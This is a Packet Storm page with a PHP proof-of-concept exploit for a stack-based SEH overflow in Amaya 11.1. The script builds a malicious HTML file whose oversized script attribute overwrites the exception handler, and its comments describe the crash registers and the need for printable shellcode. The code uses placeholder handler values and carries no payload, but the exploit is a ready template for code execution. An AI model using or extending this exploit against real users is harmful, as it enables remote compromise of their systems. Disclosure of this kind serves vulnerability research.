Proof of concept exploit for a stack overflow in the W3C editor/browser in Amaya 11.1.
c8cc993bdbfb58dd0acbd2801ee0c7692ef7f2bcc6f6136385d5c3918f42cc12<?php
/**//*
Amaya 11.1 W3C's editor/browser
Stack Owerflow POC
Discover by Alfons Luja
Thx : OiN
select * from friends --
This stUff overwrite SEH in my box XP home sp 2
To correctly overwrite seh you must upload "remote_love.html" to remote server
Amaya allow only printable shellcode in this case
EAX:00000000
ECX:43434343
EDX:7C9037D8
EBX:00000000
ESP:0012DDD0
EBP:0012DDF0
ESI:00000000
EDI:00000000
EIP:43434343
*//**/
$junk = "\x41";
$n_seh = "\x42\x42\x42\x42"; //pointer to next seh
$h_seh = "\x43\x43\x43\x43"; //seh handler
for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }
$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";
$hnd = fopen("remote_love.html","w");
if($hnd){
fputs($hnd,$hello);
fclose($hnd);
echo"DONE !!\n";
} else {
echo"Kupa !!\n";
}
?>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed